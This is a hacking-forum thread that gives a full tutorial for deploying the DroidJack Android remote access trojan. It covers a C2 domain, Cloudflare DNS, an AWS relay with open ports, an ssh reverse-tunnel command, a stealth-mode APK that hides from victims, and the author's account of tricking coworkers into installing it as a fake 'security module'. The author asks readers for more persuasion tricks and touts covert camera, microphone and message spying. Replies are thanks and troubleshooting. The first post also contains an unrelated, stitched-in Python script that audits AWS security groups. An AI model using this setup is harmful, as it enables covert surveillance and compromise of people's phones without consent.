Android Remote Administration Tool – Full Setup
by Fotrax - June 26, 2020 at 09:55 PM
#1
Today, I will share with you all the setup I use for the deployment and monitoring of Android smartphones using DroidJack and the Amazon AWS infrastructure.

I will separate this tutorial into parts, so we can focus on each part more specifically and get into the details that make the difference in the deployment.

1 – Domain for Control

Honestly, I don't like to depend on dynamic DNS services like No-IP and DynDNS. Because of that, I prefer to acquire a domain of my own, used exclusively to control the RATs.

In this tutorial, we will use the domain "fotrax.me" as an example of the domain for the control of RATs.

To purchase the domain, we can use the Amazon AWS - Route 53 service, which offers a domain at low cost and with the possibility to anonymize the domain owner's information.

After acquiring the domain, you will need to configure a DNS server to control requests and define the IPs of your servers.

If you have any questions about acquiring the domain with Amazon AWS - Route 53, you can consult the proper documentation at the link below.

Route 53 - Domain Register
2 – DNS Servers

Since we don't want to rely on dynamic DNS services, we will need to make our own DNS server to control our domain.

If you have advanced knowledge, you can set up your own VPS server with BIND, but I prefer to use CloudFlare for its ease.

Just register with CloudFlare, add your domain and configure the DNS servers on Amazon AWS - Route 53. If you have any questions, follow the documentation below.

Out of personal preference, I don't like using the upper domain as a RAT control, so we should create a subdomain for control. For this reason, we created the subdomain "upstream.fotrax.me" to forward RAT requests.

CloudFlare - Add New Domain
3 – Front Server

To avoid exposing our IP directly, we will use an Amazon AWS EC2 server to be our gatekeeper.

As our EC2 server will only serve to redirect requests to our DroidJack server, you can create a simple EC2 instance with AMI Linux 2. If you have any questions, just follow the documentation below.

If you have a new Amazon AWS account, you can have access to the Free Tier, which grants you 12 months of free use of EC2 for one instance, that is, our gatekeeper server will be free for one year.

EC2 - Get Started
4 – Security Group

As Amazon AWS requires a release of each port that we will use, we will have to release the TCP ports to communicate with the DroidJack server.

First you must define the port that you will use to control the RAT. In this example, I will use port 3389, which is commonly used for remote access on Windows.

To communicate with the DroidJack server, we must release the command port, which will be 3389, and port 1337, which is the DroidJack standard file transfer port and cannot be changed.

To do this, you must release traffic from any IP (0.0.0.0/0) to TCP ports 3389 and 1337 to your EC2 server. If in doubt, follow the documentation specified below.

EC2 - Security Groups
5 – Subdomain Configuration

Now, just take the IP of your EC2 instance and create an "A" record of subdomain in CloudFlare. Remember to create a DNS record on CloudFlare with the "gray cloud", as we don't want to hide our server's IP.

In this example, we will use the subdomain "upstream.fotrax.me" as our subdomain with the IP of our EC2 instance. For questions, follow the documentation below.

CloudFlare - DNS Records
6 – Configuring the DroidJack

To install DroidJack, just download the file below and unzip the file on your computer. To execute the file, it is necessary to have Java JRE 8 properly installed.

To run DroidJack, simply access the folder that you unzipped the file in and run the "Droidjack.jar" file.

DroidJack - Mega Download
7 – Creating the RAT

To create the file responsible for remote access on Android, just run DroidJack, access the "Generate APK" tab and fill in the requested information.

App Name: Enter the name you want the application to show the user.

File Name: Enter the name of the file you want to be exported.

Dynamic DNS: Enter our subdomain previously configured for RAT control, in this case "upstream.fotrax.me".

Port Number: Insert the port for RAT control, in this example, we use port 3389.

Stealth Mode: Activate this option, which will hide the application after it is installed on the victim's smartphone.

Custom Icon: If you wish, you can select an icon to be displayed in the application.

Bind with Another APK: You can also "merge" the RAT with another application... I have never tested this option.

After filling in all this information, just select the Generate option and your RAT will be exported. I had some problems exporting the APK using Mac OS, but I tested it on my Windows 7 and it exported without any problems.

[Image: iuh6mGV.jpg]



8 – Social Engineering

Now we have the most complicated part of all: we have to use our social engineering to convince others to install the APK with the RAT.

In my case, I placed the APK in the domain of the company I work for and sent an email to all employees informing that it would be mandatory to download the installation of our new "security module" to access the system.

Many people installed it without questioning anything, and others had difficulties installing it and came to my office to request that I install this security module.

I ask you to share other ways that you use to persuade people to install an APK on their smartphone without much questioning.



9 – Accessing our Server

Before everything works, we must redirect the ports we want to our computer. For this, we will use port forwarding through SSH.

For this, we need to know the internal IP of our computer, for which I will use 192.168.0.100 as an example.

Now just open a terminal and open an SSH session with the following arguments.

Remember to change the IP "192.168.0.100" to your internal IP, change the domain "upstream.fotrax.me" to your subdomain and change the file "awskey.pem" to your EC2 instance access key.

ssh -R 3389:192.168.0.100:3389 -R 1334:192.168.0.100:1334 [email protected] -i awskey.pem



10 – Making it Work

Now just open your DroidJack on the "Devices" tab, set the listening port to 3389 and activate reception.

Enjoy and have fun accessing smartphone cameras remotely, listening to the audio of the environment, recording videos remotely, reading messages, viewing calls and even viewing the browsing history.

[Image: nep2yFa.jpg]



Did you like the content? Leave a Reputation + to me!
Did you have any doubts? Leave it there and see if I can help you!

And if you have already implemented this, leave your social engineering strategy for installing the APK.
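Step 4 above opens the relay's ports 3389 and 1337 to the whole internet. As an added example (not part of this thread or of any tool it mentions), this is the audit check a cloud defender can run over `aws ec2 describe-security-groups` output to flag exactly that kind of world-open ingress rule; the security group sample is constructed, the group id and admin CIDR are placeholders, and the allowlist of ports that may legitimately face the internet is an assumption.

```python
import json

# Assumed allowlist of ports that may legitimately face the whole internet;
# adjust to the environment being audited.
PUBLIC_OK_PORTS = {80, 443}
WORLD_CIDRS = {"0.0.0.0/0", "::/0"}

# Constructed sample in the shape of `aws ec2 describe-security-groups`
# output; the group id and the admin CIDR are placeholders.
SAMPLE = json.loads("""
{"SecurityGroups": [{"GroupId": "sg-EXAMPLE", "GroupName": "relay",
  "IpPermissions": [
    {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
     "IpRanges": [{"CidrIp": "203.0.113.10/32"}], "Ipv6Ranges": []},
    {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
     "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
    {"IpProtocol": "tcp", "FromPort": 3389, "ToPort": 3389,
     "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
    {"IpProtocol": "tcp", "FromPort": 1337, "ToPort": 1337,
     "IpRanges": [], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]}
  ]}]}
""")

def _port_range(perm):
    """(from, to) covered by an IpPermissions entry; protocol -1 means all."""
    if perm.get("IpProtocol") == "-1":
        return 0, 65535
    return perm.get("FromPort", 0), perm.get("ToPort", 65535)

def find_world_open_rules(describe_output, ok_ports=PUBLIC_OK_PORTS):
    """Return one finding per ingress rule that lets the whole internet
    (IPv4 or IPv6) reach at least one port outside the allowlist."""
    findings = []
    for sg in describe_output.get("SecurityGroups", []):
        for perm in sg.get("IpPermissions", []):
            sources = {r["CidrIp"] for r in perm.get("IpRanges", [])}
            sources |= {r["CidrIpv6"] for r in perm.get("Ipv6Ranges", [])}
            world = sorted(sources & WORLD_CIDRS)
            if not world:
                continue  # only specific sources, not a world-open rule
            lo, hi = _port_range(perm)
            if all(p in ok_ports for p in range(lo, hi + 1)):
                continue  # e.g. 443/tcp: expected to be public
            findings.append({"group": sg["GroupId"], "protocol": perm.get("IpProtocol"),
                             "from_port": lo, "to_port": hi, "sources": world})
    return sorted(findings, key=lambda f: f["from_port"])

def audit_sample():
    """Run the check over the constructed sample; flags 1337 and 3389."""
    return find_world_open_rules(SAMPLE)

if __name__ == "__main__":
    for f in audit_sample():
        print(f"{f['group']}: {f['protocol']} {f['from_port']}-{f['to_port']} open to {', '.join(f['sources'])}")
```

Feed it the real JSON with `json.load(sys.stdin)` in place of SAMPLE; the 22/tcp rule restricted to one admin address is not reported, which is the shape the relay's SSH access should have.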
#2
Hello, has somebody tested it?
#3
Thanks for sharing, I will test it, but I think DroidJack stopped.
#4
(July 10, 2020 at 01:50 PM)LORAN Wrote: Thanks for sharing, I will test it, but I think DroidJack stopped.

I'm using it normally... Something I noticed is that DroidJack has a little bit of instability in the latest versions of Android, but in versions before Android 8.0 it is working normally!
#5
(July 10, 2020 at 02:12 PM)Fotrax Wrote:
(July 10, 2020 at 01:50 PM)LORAN Wrote: Thanks for sharing, I will test it, but I think DroidJack stopped.

I'm using it normally... Something I noticed is that DroidJack has a little bit of instability in the latest versions of Android, but in versions before Android 8.0 it is working normally!

I want to ask how to RAT non-local devices, because with every tool I use I only access local devices. I used No-IP and it didn't work, do you have any idea?
#6
Thank you for the outline. Interesting. Will try it.
#7
Thank you for sharing, I will try it, hopefully there will be no problems
#8
Thanks for sharing this with us :D
#9
(July 10, 2020 at 07:57 PM)LORAN Wrote:
(July 10, 2020 at 02:12 PM)Fotrax Wrote:
(July 10, 2020 at 01:50 PM)LORAN Wrote: Thanks for sharing, I will test it, but I think DroidJack stopped.

I'm using it normally... Something I noticed is that DroidJack has a little bit of instability in the latest versions of Android, but in versions before Android 8.0 it is working normally!

I want to ask how to RAT non-local devices, because with every tool I use I only access local devices. I used No-IP and it didn't work, do you have any idea?

If you follow the structure I showed in the tutorial, you can use the RAT on local and remote devices.

Using No-IP is a little tricky because you have no control over your ISP's port filtering, and sometimes they may be using a Carrier Grade NAT, which makes it totally impossible for you to use a dynamic DNS pointing to your IP.

The structure I used in the tutorial above was to circumvent these difficulties imposed by some internet providers.

Try to implement the scenario I showed you and, if you have any difficulties with something, let me know and I will help you as much as possible.
#10
I will try the tutorial. Thanks for sharing... I'm testing it now... Thanks.
#11
Perfect to learn a new thing.
#12
Good read indeed, I like to hear such experiences.